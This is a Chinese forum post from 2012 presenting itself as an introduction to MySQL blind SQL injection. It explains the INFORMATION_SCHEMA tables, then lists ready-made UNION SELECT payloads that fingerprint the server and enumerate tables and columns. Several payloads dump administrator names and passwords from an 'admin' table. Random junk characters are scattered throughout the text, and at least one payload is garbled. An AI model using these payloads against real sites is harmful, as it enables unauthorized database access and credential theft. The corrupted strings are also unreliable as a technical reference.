本文介绍MYSQL盲注的一些语句和方法
. t1 V8 `2 k. ^: K: E% [! L8 x; q* o7 p& E. ~+ t/ X: `
学习盲注前先了解下 IFORMATION_SCHEMA 库, s* v; g& k7 Z
5 C8 B$ n# _: `; v+ u! C. w% y
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有 D# L6 \1 h0 \ Y+ x/ P
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
/ g* v d, U: S' [1.得到所有数据库名:( E2 g8 {! ?8 j6 A8 W2 j
|SCHEMATA ->存储数据库名的表5 k2 q5 U. u% I) o/ }1 j
|---字段:SCHEMA_NAME ->数据库名称; S& O( N- g' z ^/ S3 `3 V
1 o1 n5 m8 u% z! j/ }: n
|TABLES ->存储表名
7 t4 N; ]: W# c$ W|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
! r6 B+ m# L. P# b7 W|---字段:TABLE_NAME ->存储表的表名( H% J: u- ]9 V6 d- K
- b9 G' v0 n% M9 E* ]6 V; b* h|COLUMNS ->存储的字段名表/ _. w7 E3 q9 k8 A* }$ a
|---字段:TABLE_SCHEMA ->该字段所属数据库名& B- i$ C8 E, M! m
|---字段:TABLE_NAME ->存储所属表的名称! ]! L% R0 o H1 g: U" k3 X- z
; e2 f. g& n) d& g) v
|---字段:COLUMN_NAME ->该字段的名称
, e& j& ]& @8 A' E9 Q h
D3 K6 d6 K8 r. s 8 `1 X- {& x: ?/ Q9 `* ^
2 A; R8 x4 K9 s/ F) W###########################################################################
1 R: C# k4 S7 @7 s( q' q' Q$ o; K, L* d2 R
0x001 获取系统信息:
7 C; I3 p9 e# h9 h. z! Z6 a( O; m$ y, f) D! B
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*$ B/ `0 R% o" n2 J5 U
% w5 S t( x) Z; E* P
/*
R9 o1 ?- } v7 P; [/ d. c6 \) @ C8 v( a0 F) c0 T
@@global.version_compile_os 获取系统版本; [3 _! D0 \: Z; R/ @$ S+ T5 m
) H( U0 \' n* k+ T* `4 D$ U ?@@datadir 数据库路径
+ Z+ Q" S" e |- `4 }9 u/ }( Qdatabase() 当前数据库名称
/ O- x8 u; [: a7 P0x3c62723e 换行HEX值
3 z: D$ i8 N* A! o; [6 p% C8 A2 k1 G3 p
*/$ l6 |* Q. x/ W% q
$ x7 A2 @3 ]" e0 [2 \: G1 S( }
' }0 o, B- o- U4 a/ A$ E. W0 n. O7 v
4 p" t, F) z: r, ~######################################################################
9 d, X! Y+ F- F! b. `7 d3 A- u. ~4 u3 \& {) _( S% S
0x002 获取表名
0 G8 b/ q4 C% [2 j5 w
; X9 ?3 h( h% Y; t' T6 Y( y1 Xunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
+ m6 }! b/ p( I4 y: b
, K9 r. ^0 B. _- u: O ) P7 A5 C% Y0 O
1 P X, i9 ], t( x( i9 p. p/*. Q- u* V6 ~, U" \+ f. W3 e6 \
7 K5 G: M" _3 R6 I
0x67617264656e 为当前数据库名; X: B1 d, {/ k
+ W3 S1 x1 |0 wgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名- w4 T$ A Q9 W l$ k# X. T2 B
- N% q ^1 V8 E3 r
*/
U4 t D" [9 E8 i' C" H1 C S- `% X& p: u4 Z3 K9 K
######################################################################
- S. d0 n |* z- x1 j9 z: d) Z! v |/ N: V' y
) I* Z6 d2 ?# a. ?! [7 v9 H+ N
$ U7 M7 f' S8 z( ^. R& D) X4 {' d A7 F0x003 获取字段
. k; t( ]( }" M7 M: j% u8 ]; I; w
# W- ^% I; y8 O" eunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*/ j2 i, D) U7 L' d/ Z/ Y( C7 F- x
# v( p- ^ B, g' E+ D. a* f3 M
/*% W4 U: f6 }* F. k+ P& v; s
& R1 v9 ^& }6 D* O; S7 O2 k% d* L
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段2 V) v0 n8 z: e$ I7 R! g
3 k8 h2 e3 T1 A5 A3 m8 H
0x61646d696e ->选择一个表( n( M0 q; o: x; O% T$ b
. R7 c" g% t4 Y" j$ S" v" U% a) o/ E3 v
0x67617264656e ->数据库名- l' c' o7 ~0 n" t0 `. c. K
S- X* F8 i }- J+ Q
*/* c( U1 j# D$ x# M- \3 x- [0 g2 B
+ o0 D. @7 ~! m/ x- E: u
##################################################################### [8 o7 q- g5 }, F+ o3 [- v
( v8 S+ R$ m n9 E _% v. h: g
2 J4 a& ]$ l# [
8 t2 p+ r1 C! S. w* _0 `4 Z! ]6 }0x004 获取数据
5 X, W6 D2 W A. Y( O
+ F% E( ?8 b) {5 L1 y9 uunion select 1,2,3; J- I) q% h) t, F/ H
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
" L' D5 J; L* s6 l
4 @7 j' d, V( L2 h2 zunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin- @# X5 P% p4 n8 }) }
0 p% Q$ O. \# Z; I 0 s9 w$ Y! k: V& f6 z& {
1 j# ~2 }3 R( @6 D$ t& n5 }/*4 M" ^' m# D1 V U5 `8 P8 R A; m
/ f5 H6 p) T6 N/ [/ J0x3c62723e 换行符号HEX编码 y. t. `! q& @1 n2 b
( {4 X% ]3 H9 [' |7 d* m# Agroup_concat 同时获得该字段所有数据
* s( i) u* ~8 P. }1 Q0 R1 `6 O# n( E" N/ N8 [
*/% N3 x( F m( O1 F
! P+ R9 |( M" @1 {% m$ ?8 s |
发表于 2012-9-13 17:48:44
收藏
支持
反对